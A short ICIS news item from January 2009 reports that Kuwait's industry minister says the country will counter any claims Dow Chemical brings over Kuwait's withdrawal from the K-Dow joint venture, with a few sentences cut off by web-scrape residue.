So now we can see where our team are performing their defensive actions – although remember a few players are missing. In terms of analysis, does this suggest that this team defends better on the left? Or is it more likely that they faced a team that largely attacked on that side? Visualisation is just one small piece of any analysis!
Summary
In this tutorial, we have practiced filtering a dataframe by player or team, then using SciPy’s convex hull tool to create the data for plotting the smallest area that contains our datapoints.
Some nice extensions to this that you may want to play with include adding some annotations for player names, or changing colours for each player. Of course, these charts aren’t limited to defensive metrics – why not take a look at penalty area entry pass zones, or compare goalkeeper distributions? However you build on this work, show us what you’re achieving on Twitter @FC_Python!
Find further visualisation tutorials here!
|
https://fcpython.com/visualisation/convex-hulls-football-python
|
CC-MAIN-2021-43
|
refinedweb
| 1,259
| 71.95
|
Newbie to backtrader - CSV Data feed
- Quy Bao Le last edited by
Hi all,
I tried to feed data from CSV but it didn't work
My CSV data is as below
My code is
import datetime
import backtrader.feeds as btfeeds
class MyOHLC(btfeeds.GenericCSVData):
params = (
('fromdate', datetime.datetime(2017, 12, 1)),
('todate', datetime.datetime(2017, 12, 31)),
('nullvalue', 0.0),
('dtformat', ('%Y-%m-%d')),
('tmformat', ('%H.%M.%S')),
('datetime', 1),
('open', 2),
('high', 3),
('low', 4),
('close', 5),
('volume', 6),
('openinterest', -1)
)
data = MyOHLC(dataname='E:\Data\HPG.csv')
print(data.getfeed())
The result is always None.
Somebody please help.
Thanks a lot
- Paska Houso last edited by
@quy-bao-le said in Newbie to backtrader - CSV Data feed:
('dtformat', ('%Y-%m-%d'))
To start with ... that won't for sure match the (not fully displayed) column for datetime which has this format:
%Y%m%dand possibly more content after that.
To continue with:
An Excel table is not CSV. Your intention is clear, but it would be better if you showed the actual CSV data (a couple of lines suffice)
You can read the remark at the top ... and format your code easily (that will make it easier for others to read and help)
A complete sample (as small as possible) is always a lot more helpful than out of context snippets.
|
https://community.backtrader.com/topic/799/newbie-to-backtrader-csv-data-feed
|
CC-MAIN-2018-39
|
refinedweb
| 225
| 65.62
|
C9 Lectures: Dr. Erik Meijer - Functional Programming Fundamentals, Chapter 3 of 13
- Posted: Oct 15, 2009 at 8:46AM
- 87,360 views
- 54 comments
![if gt IE 8]> <![endif]>
Something went wrong getting user information from Channel 9
Something went wrong getting user information from MSDN
Something went wrong getting the Visual Studio Achievements
Right click “Save as…”
In Chapter 3, Dr. Meijer explores types and classes in Haskell. A type is a collection of related values and in Haskell every well-formed expression has a type. Using type inference, these types are automatically calculated at run time. If
expression e returns a type t, then e is of type t, e :: t. A function is a mapping of one type to another type and you will learn about new types of functions in this lecture, specifically curried functions: functions that return functions as a result (and
functions are values, remember) and polymorphic functions (function with a type that contains one or more type variables). - excellent series so far. Also Learn You A Haskell A Great Good () is an excellent reference source for some of this material. Thanks again Dr. Meijer.
Some might like my Haskell Cheatsheet at. It's a short reference & mini-tutorial.
OK - done pimping now
Justin
Well it's the good kind of pimping and that is a nice cheat sheet. I will definitely reference it when my memory fails to remember some construct that I know would be simple in the first place
Exelent! I was looking forward to the next lecture.
I like the syntactic symmetry of inverse associativity for function declarations and function applications.
So the paranthesis' become denser at the left or the right.
The zip function is quite beautiful and metaphoric. Erik's definition
is super-symmetrical*. But then there is something nagging me (just a little bit) - here currying is suddenly not as pretty anymore because it breaks the symmetry, which is the motivation for Erik's own definition. 3 notions of structure: curried function (function to function to sequence), list (homogeneous unbounded sequence) and tuple (heterogeneous bounded sequence).
I assume curried functions can be treated as sequences as well - flipping and reversing arguments. And lazily (always here) so no time is wasted while jusing doing what I think Erik refers to as symbol pushing. Must see...
The book has not arrived yet, still waiting. That's not unusual, but hopefully it will arrive before the end of the lecture series.
* Sometimes (especially functional) programming language design looks like the search for a unified theory of everything - for computation, types and syntax. Slowly crawling closer and closer to nirvana. Haskell looks like the closest thing so far, although maybe still susceptible to decades of further axiomatization.
This episode is so full of Funk it could do with a 70's porno music track.
Last time Eric mentioned his hope about interactive app with C# codes. There is one actually available: LINQPad.net
Justin, Thanks for the cheatsheet..
One question about this:
or
I typed those in hugs and they are not recognized syntax. Are those just description about a function?
By the way, is there any way to get descriptions like above ones out for a predefined function such as zip?
The complete HUGS is 14MB while GHC is 50MB. The size may make the difference or better features?
You can type things like
in Hugs or GHCi and it will work. Hugs and GHCi are interpreters that expect expressions, which they'll gladly evaluate and print.
However, when you type something like
in Hugs or GHCi, you're asking it to evaluate the expression f and telling the interpreter it has type Int -> Int -> Int. There are several problems with this. First of all, the interpreter does not know what this "f" thing is you're talking about, unless you have defined f in a Haskell script and have loaded that script file. Secondly, if you did define f somewhere, functions themselves cannot be printed to the console.**
** Often the cryptic error thrown by the interpreters is something along the lines of "There is no Show instance for Int->Int->Int".
You can use ":t" to find the type of something:
Prelude> :t zip
zip :: [a] -> [b] -> [(a, b)]
Prelude>
For those who are interested, the C# zip function Erik talked about (shown below)...
...also exists in Haskell as zipWith
...and can be implemented using only two lines of Haskell.
Type-inference: An IDE idea
Suppose we had a Visual Haskell IDE. Then for any function definition, type-inference will kick in and dynamically derrive the type from the function definition. That's nothing new.
Now imagine these two scenarios -
Scenario 1: While we are typing a definition, the IDE will assist by displaying a ghostly function type definition for our function above the function definition itself, as we go
Scenario 2: We start out by typing in the function type definiton, then we lock-in the definition (context/lock definition). Second we go on to define the function itself. Here we are dynamically informed about mis/matching as we type while being able to see both the lock-in type of the function as well as the inferred type of the function.
First of all if we don't want to, we don't have to type the function type definition. When we are satisfied with a definition we can lock it in.
Then there's point vs point-free style. There the IDE will always normalize a function into a point-free style (good idea?) and then on the right show it in point style; or one can switch between point and point-free styles globally for a file (well, at least while we still keep the notion of a file).
Sounds like there are many interesting things a Haskell IDE could help with.
I don't think it's a good idea if a function would automatically be transformed to a point-free notation by the IDE. Sometimes the point-free version is much harder to read**. Nevertheless, it would be a great optional tool in an IDE.
** Example:
Btw, the pointfree version of this example can be made simpler if you'll use the commutativity of (*). The only problem is that the commutativity property is not garantueed, so a (syntactic) pointfree tool cannot rely on it.
Nice. Thanks for your replies, @ShinNoNoir and @sylvan. By the way, here is an alternative I got:
This will open the source file by Vim (in my computer) and point to the definition of zip.
I can't believe you're doing 13 of these. Fantastic.
This is the precise definition (abbreviated)
Now Erik mentions we don't have a tuple type, but in BCL 4 we now do, so it would not surprise if we see this later on
Although I'm not sure it's so useful in C# when we have the "fusion zipper". Appropos, Erik, didn't you define IE<A> as A* in Cω? So then we could write this more succintly as
And if C# had syntactic support for tuples, maybe we could even write something like
Or, now going completely mad
with pattern matching syntax in method signatures (tuple deconstruction).
Now why do we have to suffer with a block declaration if we just want a one-liner definition?
At this level the "reversed" signature (return type before argument type) also starts to grind a little (or even the fact that the types need be there at all).
Now we might as well just use Haskell...
Then of course the question becomes - now that we've also given IE special treatment, then what is the syntactic form of the semantic dual of A*?
Am I right that the
ZipLINQ sequence operator in .NET 4.0 whose signature Erik wrote down actually corresponds to Haskell's
zipWithfunction, not
zip?
Without looking it up, using kind of my mental type inferencer, the type of zipWith would have to be, which is exactly the signature of .NET 4.0's Zip.
Actually, the new BCL zip (looking up) is
And the type of the Haskell zip (looking up) is
So the BCL definition is closer to Erik's super-symmetric version, except that it uses a constructor function rather than just returning tuples. Well... actually it's just as far away...
That's cool!
Actually it could use Brian's definition of simpler: shorter!
If the point-free style is shorter, then choose that, if not, then don't. Keep both side-by side for reference (left side the shortest; right side the longest - whichever form is whichever)
And yes, the point-transformer should use maximal type knowledge.
I can appreciate these lectures, but I think it would be nice if there was a series of lectures which dealt with beginners. I guess Erik is trying to convert the C# crowd by repeatedly bringing up references to it, but I think it would have been better had he presented the problems and then just showed how it is done in Haskell.
One drawback of having an Uber-Expert teach something like this is that things that seem trivial to them will only make sense (and therefore appeal) to "the initiated" .. that leaves beginners like me out.
I'm just checking Haskell out and was hoping I'd be able to learn something from these lectures but he is constantly delving into advanced material and constantly keeps comparing with C# ... I don't really know what the purpose of this series of lectures is. To compare and contract C# vs Haskell or to elaborate on Functional Programming Fundamentals using Haskell?
I find Erik's teaching style a little hap-hazard and rather opaque from an outside learner's perspective. If the idea is to appeal to the Haskell initiates, then I guess the lectures are going well. Not all of us are super mathematicians waiting for the "triple curried function" manna to descend from the Redmond heaven... ROLLEYES
How about a little less pretentious, and a little more concrete? How about writing a little game? Like Tetris or something?
We'll figure out the Currying and the C# comparisons on our own thankyouvery much. [\RANT]
Thanks for the feedback.
The idea here is not to preach to the Haskell choir (obviously)... It's to teach imperative-minded programmers to think functionally, to understand how to program in a functional way, to understand that the future of programming will involve an increasingly functional style embedded inside imperative languages like C#.
Yes, you do need to understand currying. You do need to understand polymorphic functions, higher order functions, lazy evaluation, etc. It's awesome, in my mind, that Erik is including references to languages that most of you already program in as a way to hammer home the fundamentals. Doesn't that make sense in context?
This is not a Haskell 101 class. Haskell is the concrete language reference point used here ( it's a pure functional language so it forces the fundamentals to the top of your mind, then out of your fingers onto the keyboard -> you can do the exercises in it...).
C
I can only show you the door, you have to walk through it.
First off, I have the utmost respect for Dr. Meijer and I think he is a great "fundamentalist" evangelist for functional programming. For a long time, Haskell seemed too ivory tower to me and I didn't bother checking it out.
You know what made me take a serious look? A mario brothers clone ("nario") written in Haskell by a Japanese hacker.
video: & code here. So I've been looking at the LYaHfGG and the Haskell Books ... and I guess I was hoping these lectures would be more accessible but I guess not. Most talks on Haskell involve the high falootin' higher order this and monad vs monoid that .... I mean yeah, sure, that all is possible, but where are we supposed to go learn basic stuff? Especially when claims are made that FP is destined to replace Procedural programming etc (which it probably is).
Is anyone willing to come down from the mountain and teach us mere mortals? or is Haskell for big shot brainiacs? For the "real problems" out there? because if so, isn't there the possiblity that it will end up in Lisp-Lisp-Land ?
Anyways, don't mind me. I'll shut up now.
> You know what made me take a serious look? A mario brothers clone ("nario") written in Haskell by a Japanese hacker.
That is indeed very impressive.
But to get the spirit of functional programming you have to learn to "understand" concepts such as currying, monads, ... It is really not that hard. Wax on, wax off. Wax on, wax, off. Wax on, wax off.
I think you're missing a great opportunity here. Please ask questions about all the thing that Erik is presenting and you don't understand. I bet you would get a lot of help in the forum. That would help a lot of people that might be having the same issues as you. Also it would give Erik an inside of what concepts are difficult to grasp and help him to better present future chapters.
Another think hat you can do is read the chapter of the book that Erick is going to present in advance. That way you know what's going to be covered. If you don't have the book, the slides are here:.
I hope this helps.
I think I get what reddit is saying, but I have the advantage of working with haskell many moons ago and therefore the concepts are not new to me. The reason I can sympathise is that even though I can read Erik's homework questions and immediatly know the answers, when I watch through the explaination, I immediately think of what scenario it could apply to. So with the zip function, I couldn't think of a use of converting two lists to a list of tupples, as data is never that precise to make a perfect match. (maybe to many outer joins in SQL dealing with fuzzy logic) So with all that said, I think it could possibly help a subset of us, if Erik could also include some quick examples of application of a function or two to assist in the learning process. I think that is what reddit was alluding to with the small game comment.
Maybe it's just me, but I've programmed in so many languages now, that comparing one to another to help learn the new one become information overload and I tune out. By seeing something in it's own right, rather than a reflection of something else, I find it easier to invent new things using it. eg. I wrote recursion in C for my first assignment. Not because I understood what recurrsion was, but that it looked like the simpliest and least amount of code way of solving the problem; and especially as it didn't core dump like my previous attempts.
Nice, but with .NET 4.0 this is actually even cleaner:
Not sure it's cleaner but it shows how to use it without having an overloaded Zip for tuples. And even shorter
I'll buy that for a dollar. Quite short, but I still want the overload.
Got my copy of Graham Hutton's Programming in Haskell yesterday and can't wait to put my nose into it.
Thanks a lot Dr. Meijer for this fantastic series!
btw: I love the lecture / chapter based format of this webcast series. Hope to see more webcasts like this in the future.
I don't think the criticism by reddit is quite fair - but the part that you mention - practical uses of certain more complex abstract functions is quite reasonable. And that doesn't imply that a game needs to be built to show it.
Erik compares and contrasts Haskell to what we already know (C#) so that we may better understand it - As he should! And he actually does this with respect despite his love for Haskell: arguing about the OO and the benefits of Intellisense and so on. And the same for F# which too is not fundamentalist like Haskell. But I find the laziness of Haskell liberating because I don't have to constantly worry about explicitly introducing it where needed. It remains to be seen how the purity will play out.
As for preaching to the choir: I personally have no prior practical experience with Haskell. It always looked too scary. But I am armed with an interest in functional programming and some playing around with ML and functional style C# and Javascript. This lecture definitely has helped pass the threshold into Haskell. I could have used this a couple of years ago.
So I say: the series is on track, possibly with one or two more practical examples thrown in here and there to kick-start the imagination.
Basic Mathematica and Haskell should be used in primary school to help prime kids for transferring mathematics directly to practical applications and as a learning tool for testing assumptions. Actually Haskell and Logo would be cool companions.
exoteric, I appreciate your comment and perhaps I could have worded my comment in a less belligerent way. I do have a few comments about your assertions:
"practical uses of certain more complex abstract functions is quite reasonable. And that doesn't imply that a game needs to be built to show it."
Yes, one would have to agree with the general spirit of the comment, but there is a time and place for teaching complex abstractions. Complex abstractions without a "hook" are useless from a pedagogical perspective because pretty soon you have no-one new to teach and the choir is already well versed in the black art of whatever-it-is-that-rings-your-collective-bell.
I don't think a game needs to be built, but maybe something concrete instead of "lists within lists within lists".. perhaps that is immediately accessible to some here, but for most people, it is better to sort of feel their way around a new paradigm, and Functional Programming _is_ a new paradigm especially for people whose brains have been "messed with" by languages like C or BASIC etc ...
So, that is what I was trying to get at, and at the root of it was a misplaced assertion that perhaps these lectures were for general consumption. Personally, I would love if someone would explain what that game is doing. For example, I looked at the code, and learned something new about "Data" and the "Deriving" part. So I went and looked it up in the Haskell documentation to see what exactly it does.
You see, when I have the hook, I'll do the leg-work. The "hook" is the concrete part. Something "I" (the proverbial outsider programmer/analyst ie "non haskeller" ) can relate to. Something in the real world which I can anchor myself to and then start feeling around this new "elephant" trying to understand what it is. And I disagree that abstract comparisons between two language definitions (C# and Haskell) are somehow useful for the general population (or that they constitute this "hook" that I speak of.) The people who can be worthwhile contributers to Haskell (if that is a goal at all) are scattered within the technical community, and not necessarily within just C# community. So to claim it is the right thing to do is going a bit far.
An average programmer (especially a C# programmer) moves bits around and does daily drudge-work and not necessarily spend his/her time philosophizing about higher order functions and how they could be used to optimize the inventory reports. So, it would be more helpful -- maybe not in this lecture series as this is "not Haskell 101" -- if an average daily problem encountered by a generic programmer/developer/ (dare I say Systems Admin?) was presented and then in every lecture the solution was built upon.
Again, Haskell appeals to me because it strives to be "pure" and is simpler to understand because it presents mathematical concepts without extra fluff or baggage. But I get the feeling that the "high priest" class (the alpha nerds .. not Mr. Meijer or Brian etc.) thinks that certain problems are worthy of their attention while the more pedestrian and mundane aspects of programming are kind of better left on the wayside as they're just not sexy enough to merit any serious intellectual effort in terms of teaching, even though, IMO, mundane things can get you started and then you can go on and spend more time on the hi-fi stuff... but you'd have to be "in the game" to do that. If you walked off because people insisted on teaching you currying (it's great! please don't get me wrong) and really esoteric stuff ... then I don't know if it is realistic to say that FP should be the premier mode of computing. It just won't happen and I don't think the revolution will come from the ranks of play-it-safe hordes of C# programmers. (no offense to play it safe C# programmers I'm sure you're great people to have a beer or two with).
Again, this is just what I think and I don't mean to hurt anyone's feelings.
Perception is a truth in itself. So if one perceives this lecture series as inaccessible then that is a truth. It may not be the truth for all people but it is for at least a non-empty set of people. I can only speak for myself saying that I can't perceive how it could start out much simpler than what it's done - but for sure: the earlier the practical examples are introduced, the better. Over 'n out.
(...Not quite: I don't agree with Charles that this is not a Haskell 101 class. It may be that teaching Haskell is not the purpose of the lecture series but is definitely a significant side-effect of it. And since Haskell has such a compact noiseless syntax it really is ideal for that. It's almost like you don't see the syntax, you only see the core semantics. And the semantics is exactly what you can reuse elsewhere.)
I loaded an haskell file with following code on hugs:
double x = x + x
quad x = double (double x)
quadrup = double . double
If I try "quad 1.01" (without quotes), the correct result of 4.04 is returned but if I try "quadrup 1.01" (without quotes) hugs returns following error message.
ERROR - Cannot infer instance
*** Instance : Fractional Integer
*** Expression : quadrup 1.01
Hugs returns the following types for quad and quadrup.
Main> :type quad
quad :: Num a => a -> a
Main> :type quadrup
quadrup :: Integer -> Integer
Why does quadrup end up with type of Integer -> Integer instead of "Num a => a -> a" ?
You have hit a subtlety in the Haskell design
....
Ah, nice, I missed that one! It can infer up to 8 parameters, I wonder what happens when you use more, or try to zip and list of tuples to itself ....
Well, I found out ... VS2010 hangs and I had to kill it. Intellisense was getting slower and slower, and the type became huge in the tooltip. Eventually with every new line where you are inferring something else, it just locks up.
Took Haskell in school and these lectures are great refreshers.
Looking forward to lecture 4.
This is shaping up to be a very nice series. I probably missed it but are the slide decks somewhere? Occasionally a slide is only seen in the far view - and my eyes can't quite pick it up.
Thanks
The slides can be found here.
Awesome. Perhaps the most hard think to work with haskell is to work without IDE. Only now I recognize how lazy I become after 4 years of C# programming =)
Erik could u please name IDE you are prefer for Haskell?
Actually: name the top IDE's for Haskell.
PS - looking forward to hearing about non-/termination. I see now that the book you previously recommended, which I hadn't started on yet, Introduction to functional programming using Haskell, does mention this undefined business - i.e. the bottom type.
Here is part of the homework:
Nice lecture, please keep up the good work!!!
It's great man.
I have the same problem in ghci.
What does work though is to type:
So you need to type the type definition and the function definition in one statement.
I think this is because you're using an interpreter instead of a compiler.
I'm a beginner myself so, my apologies if any of the terminology is incorrect.
-edit-
Apparently there are multiple pages of comments and this question has already been answered, oops
Erik, can you explain a little about the pseudo "for all" notation you mentioned - why would you use it, when would you not use it?
Will we get a video today?
Yes, you will!
C
Justin, that is one cool cheat sheet. Thanks!
Radu
See for instance
@DrErikMeijer: .Net has a Pair class, It's tucked away in the System.Web.UI namespace
I believe from the book or the video that classes are, as types, inferred.
For example, in exercise 2 the type double accept a Num a class constraint as argument; it's unclear if it is inferred from the operator * , the number 2 or both.
How does it work effectively?
Excellent series so far. As mentioned previously, I am looking forward to seeing a "real" haskell program.
I completely disagree with reddit that the contents of these early lectures are too high falootin'
I too am a beginner with functional programming, but I recognise that this is the basics, the easy stuff. I'm sure that watching a competent functional programmer write something 'concrete' would knock us beginners on our * and have us longing for content like this.
Remove this comment
Remove this threadClose
|
https://channel9.msdn.com/Series/C9-Lectures-Erik-Meijer-Functional-Programming-Fundamentals/C9-Lectures-Dr-Erik-Meijer-Functional-Programming-Fundamentals-Chapter-3-of-13?format=flash
|
CC-MAIN-2015-48
|
refinedweb
| 4,373
| 72.16
|
I added the rx-main package to the a WPF Workbook but when I type 'using System.Reactive;', both the autocompletion and the compiler fail to find the namespace. I tried my own NuGet package and worked fine.
What am I missing here? What version of .NET is the WPF Workbook using?
Any idea why it doesn't work?
Submitted issue to
?
Thank you for filing a bug so that this is on our radar.
There are a lot of NuGet packages that don't work correctly yet. See.
Thanks for the reply. Just wanted to contribute with a test scenario and to be sure RxNET was under your radar.
Still doesn't work in 0.9.0
Today a new version of Rx.NET was released supporting .NET Core 1.0. It requires NuGet 2.12 while version supported by 0.9.0 is 2.10.766.
The package is now called System.Reactive 3.0.0.
I tested version 1.0.0.0 released today and I'm happy to say that it can finally add System.Reactive.* packages.
Unfortunately when I run:
I get the following message and nothing happens.
"warning CS4014: Because this call is not awaited, execution of the current method continues before the call is completed. Consider applying the 'await' operator to the result of the call."
If I await the observable, I get only the last value. This is the expected behavior for an awaited observable but it would be interesting to not have to await and see all the returned values, just like LinqPad has been doing for a long time.
I got some help from Paul Betts that gave me this solution:
It shows all the values once the observable completes. It works but it would be much nicer if you supported output from IObservable and show the values as they become available.
Glad it works! IObservable support would certainly be a useful feature.
Any news on this? Has IObservable() support been added to any of the recent versions ?
|
https://forums.xamarin.com/discussion/comment/319174
|
CC-MAIN-2019-43
|
refinedweb
| 338
| 78.65
|
C++ and functional programming idioms
If you’re curious like me, you probably ventured at least once in the scary and mind-bending world of functional programming, came back and told yourself: “It would be nice if I could do this or that in c++”. FP languages have been present for decades but only recently, we’ve been starting to see the adoption of some of their techniques in classical imperative languages… like higher order functions, closures/lambdas functions, currying and lazy evaluation. For example, Javascript supports closures since version 1.7 and C# from 3.0.
Seeing how useful these techniques are, it’s normal to want them in our favorite programming language. We’re already doing a bit a FP without knowing thanks to the standard library algorithms. Lots of them takes functors/predicates as arguments so they mimics fairly well the behavior of higher order functions. Besides that, C++ has no built-in support for other idioms like lambda functions or closures but we can achieve similar effects due to the lazy nature of templates and a technique known as “expression templates”. More on that technique on a future post…
To demonstrate my point, let’s take a small program that takes a string as input and return the most frequent character. In the old classical C++ way, it could be implemented as follow:
#include <iostream> #include <locale> #include <map> #include <string> namespace { char most_frequent_letter(const std::string &str) { typedef std::map<char, unsigned int> char_counts_t; char_counts_t char_counts; for(std::string::const_iterator itr = str.begin(); itr != str.end(); ++itr) if(std::isalpha(*itr, std::locale())) ++char_counts[*itr]; for(char_counts_t::const_iterator itr = char_counts.begin(); itr != char_counts.end(); ++itr) std::cout << itr->first << " => " << itr->second << std::endl; if(!char_counts.empty()) { char_counts_t::const_iterator highest_count = char_counts.begin(); for(char_counts_t::const_iterator itr = ++char_counts.begin(); itr != char_counts.end(); ++itr) if(itr->second > highest_count->second) highest_count = itr; return highest_count->first; } return ' '; } } int main(int argc, char *argv[]) { if(argc > 1) { std::string some_string = argv[1]; std::cout << "The string is: " << some_string << "\n" << std::endl; std::cout << "The most frequent letter is: " << most_frequent_letter(some_string) << std::endl; } else std::cout << "Usage: " << argv[0] << " <string>" << std::endl; }
So far so good, it works and does the job. We’re putting the characters in a map using the character as the key and the count as the value. Then, we print the content of the map and finally iterate through it to find the character with the highest value. The problems with this code is that we’re reinventing parts already in the standard library and that code lacks expressiveness. Let’s see how the code could look like if we used the standard algorithms.
namespace { template <typename map_t> struct map_filler { typedef void result_type; map_filler(map_t &map): map_(map) { } template <typename T> result_type operator()(const T &t) const { if(std::isalpha(t, std::locale())) ++map_[t]; } private: map_t &map_; }; struct pair_printer { typedef void result_type; template <typename pair_t> result_type operator()(const pair_t &pair) const { std::cout << pair.first << " => " << pair.second << std::endl; } }; struct pair_value_comparer { typedef bool result_type; template <typename pair_t> result_type operator()(const pair_t &a, const pair_t &b) { return a.second < b.second; } }; char most_frequent_letter(const std::string &str) { typedef std::map<char, unsigned int> char_counts_t; char_counts_t char_counts; std::for_each(str.begin(), str.end(), map_filler<char_counts_t>(char_counts)); std::for_each(char_counts.begin(), char_counts.end(), pair_printer()); char_counts_t::const_iterator result = std::max_element( char_counts.begin(), char_counts.end(), pair_value_comparer()); return (result != char_counts.end()) ? result->first : ' '; } }
Hmm… Okay… Let’s see, our “most_frequent_letter” function is now using the standard library algorithms. It does make the function clearer and way more expressive but at the cost of around 40 lines of “support code” whose are in our case, functors. Even when thinking in terms of reusability, the chance of needing that same support code in the future is small, if not inexistant. What would we do in that case in a FP language? Use a small lambda functions/closure instead. For that example, I’m going to use boost::phoenix 2.0, an efficient FP library part of boost which is in my opinion the best general, multi-purpose C++ library and a must-have for any serious C++ programmer. Let’s see what phoenix can do:
namespace { namespace phx = boost::phoenix; using namespace phx::arg_names; using namespace phx::local_names; using phx::at_c; char most_frequent_letter(const std::string &str) { typedef std::map<char, unsigned int> char_counts_t; char_counts_t char_counts; std::for_each(str.begin(), str.end(), phx::if_(phx::bind(std::isalpha<char>, _1, phx::construct<std::locale>())) [ phx::let(_a = phx::ref(char_counts)[_1]) [ ++_a ] ]); std::for_each(char_counts.begin(), char_counts.end(), std::cout << at_c<0>(_1) << " => " << at_c<1>(_1) << std::endl); char_counts_t::const_iterator result = std::max_element( char_counts.begin(), char_counts.end(), at_c<1>(_1) < at_c<1>(_2)); return (result != char_counts.end()) ? result->first : ' '; } }
I made a few using statements to make the code easier to understand. Let’s take a look the for_each statement, the 2 first arguments are the usual .begin() and .end() but then you see that strange if_ as the third argument. if_, like every phoenix statement, returns a functor object created at compile time via template composition (Expression templates). So with this library, you can create inline functors on the fly without the “support code” bloat. You can use your own functors as long as they’re lazy which means they don’t do anything before the operator () is called on them. Fortunately, the lib also provides wrapper for “normal” functions.
Now for that code, nothing much to say for the if_ statement, it’s just a lazy version of the classic if keyword. phx::bind is one of the included wrappers, it creates a lazy version of a function passed as the first argument binded with the arguments passed as additional parameters. _1 and _2 are placeholders, they’re the actual parameters passed by the algorithm to the functor and phx::construct returns a new object of the type passed as the template parameter. Knowing that, we can now understand that “phx::bind(std::isalpha, _1, phx::construct())” returns a lazy version of std::isalpha with the current argument from std::for_each binded as the first argument to std::isalpha and an object of type std::locale binded as the second. phx::let’s only purpose is to create scoped local variables. phx::ref returns a reference to the object passed as the parameter. phx::at_c is simple, on a std::pair phx::at_c returns .first and phx::at_c .second.
For more information, consult the boost::phoenix documentation.
With that new tool, we can now more easily than ever use C++ to imitate some FP idioms:
#include <algorithm> #include <iostream> #include <iterator> #include <numeric> #include <string> #include <vector> #include <boost/fusion/include/std_pair.hpp> #include <boost/spirit/home/phoenix/bind.hpp> #include <boost/spirit/home/phoenix/core.hpp> #include <boost/spirit/home/phoenix/fusion.hpp> #include <boost/spirit/home/phoenix/object.hpp> #include <boost/spirit/home/phoenix/operator.hpp> #include <boost/spirit/home/phoenix/scope.hpp> #include <boost/spirit/home/phoenix/statement.hpp> int main(int argc, char *argv[]) { namespace phx = boost::phoenix; using namespace phx::arg_names; using namespace phx::local_names; std::vector<int> input; input.push_back(1); input.push_back(2); input.push_back(3); input.push_back(4); input.push_back(5); //map( Make a new sequence with all the elements multiplied by 2 ) std::transform(input.begin(), input.end(), std::ostream_iterator<int>(std::cout, ", "), _1 * 2); std::cout << std::endl; //filter( Make a new sequence containing all the odd numbers ) std::remove_copy_if(input.begin(), input.end(), std::ostream_iterator<int>(std::cout, ", "), !(_1 % 2)); std::cout << std::endl; //fold/reduce (Builds up and returns a value based on the sequence) //I use std::string here because it makes it easier to show what is //going on exactly. std::vector<std::string> words; words.push_back("H"); words.push_back("e"); words.push_back("l"); words.push_back("l"); words.push_back("o"); //foldl std::string result = std::accumulate(words.begin(), words.end(), static_cast<std::string>(""), _1 + _2); std::cout << result << std::endl; //foldr result = std::accumulate(words.rbegin(), words.rend(), static_cast<std::string>(""), _1 + _2); std::cout << result << std::endl; }
In a near future, we’ll probably see more FP techniques being applied to imperative languages because they can make the code cleaner and more expressive without penalties. In the case of C++, like we just saw, they can leverage existing standard library algorithms and make them more convenient.
Or, you could use a functional language:
import List
f = head.head.sortBy (\x y->compare (length y) (length x)).group.sort
A slightly different approach that includes all the necessary code for the fully working program:
import List
main = getLine >>= print . snd . last . sort . map (\c -> (length c, head c)) . group . sort
Adrian: duh!
Though, Brainiac above has a point, of sort. Even if C++ can allow some constructs to be functional-like, they remain typically imperative by nature, and not dynamically typed. For example, your examples for foldr and foldl are very verbose and do necessitate the inclusion of a few boost headers (14, if I counted correctly), and the use of relatively non-intuitive constructs.
If you look at languages like Python (a hybrid functional/imperative language) that offers very simple to use (and more importantly, to understand) “list comprehensions”, your filter example reduces to:
[ x for x in input_list if (x%2)!=0 ]
which is clear, concise and a lot cuter than the C++ code based on iterators.
Would you think that in many cases it would be preferable to hide the iterator altogether? For exemple, having something like
int sum = std::accumulate(input_list,_1+_2);
where most of the complexity is abstracted away?
More is not always better, and you can hide more to use less ;)
I still think the idea of having functional-like idioms brought in C++ is a great one. I’ll have to look at what pheonix has to offer.
Steven: functional programming and dynamic typing are orthogonal concepts: there exist statically typed functional languages (Haskell, ML, Miranda) and there exist dynamically typed functional languages (Erlang, Clojure, Scheme.)
About the number of headers to include. Phoenix 2.0 right now, as of boost 1.36, is only a functional programming library part of another one(boost::spirit) but will eventually become a full-fledged library replacing the current boost::lambda and boost::bind libraries. Before its full release as a stand-alone library, Phoenix will further be refined and probably that a single “include all” header will be available. Myself, i don’t like the fact of using at_c to access std::pair::first or std::pair::second and i think a “first” and “second” functor should be made before that release. (It’s easy to do but should be included by default)
Thank you for your comments :)
Steve, a few notes:
1. Only two boost headers need to be included directly for foldr and foldl — core.hpp and operator.hpp. (As an aside, Phoenix is extremely modular; technically each operator has its own header, you can include each of them individually if it suits you, operator.hpp just includes all of them.)
2. ‘Non-intuitive’ is certainly subjective. Do you think the Python list comprehension is intuitive to someone who doesn’t know Python?
2. The lambda ‘_1 + _2′ would work given inputs of any type with an operator+, so what benefit would dynamic typing give in this context? I think quite the opposite — it would defeat the purpose of using C++ to begin with (compiler errors for types without an operator+, aggressive inlining with optimal code paths per type, etc). Template parameter deduction gives all the ‘dynamic typing’ needed for the sake of a lambda; what do you feel is lacking?
3. Your proposed ‘std::accumulate(input_list, _1 + _2)’ syntax is granted through use of a different boost library, range_ex. So given that you can already have that abstraction, what is the real critique of the lambda expression? ‘_1 + _2′ is too verbose? If too unclear, an alternative syntax is ‘arg1 + arg2′. If still too unclear, you can rename the arguments anything you want (covered in the Phoenix docs).
You are right about what’s intuitive and what’s not; for lack of a better word, I meant to say that some statements are easier read than others, for equal tasks.
for your 2nd number 2 ;) I don’t think in terms of defeating the purpose of using C, C++, or some other language. One construct hardly can justify abandoning a language for an other. C++ (and more so of C) is a language where you can have rather fine control on what exactly is going on in the machine, something that can’t be said from, ex, Python (and java, I would suppose though I suspect if you know the underlying JVM very well, it’s predictible enough). So probably chosing C++ for a given project from the start is a decision based on other criteria than merely “can I do a dropwhile that is all cute” (I exagerate, but you understand).
For number 3: no, the critique was pointed at the for_each construct, for example. You are right saying that std::accumulate is clean enough; I have nothing much to say about it. _1 and _2 are probably good choices since it’s likely that arg1 and arg2 may clash with existing variable (though the problem might not be on Boost’s side, we agree).
Great article, thanks.
I think most will already know this, but I just wanted to point out that C++0x will have lambda functions/closures built in, with a far nicer syntax :)
We _can_ have the best of both worlds (as soon as compilers let us :)
|
http://debugfailure.wordpress.com/2008/10/28/c-and-functional-programming-idioms/
|
CC-MAIN-2014-35
|
refinedweb
| 2,283
| 54.12
|
08 January 2009 17:00 [Source: ICIS news]
TORONTO (ICIS news)--Kuwait will counter any claims Dow Chemical plans to bring against it for pulling out of the K-Dow joint venture, the country’s Al-Watan newspaper reported on Thursday, citing industry minister Ahmed Baqer.
Bager was quoted as saying that the ?xml:namespace>
The paper also quoted other unnamed government sources as saying that
A spokesman for Dow Chemical was not immediately available for comment.
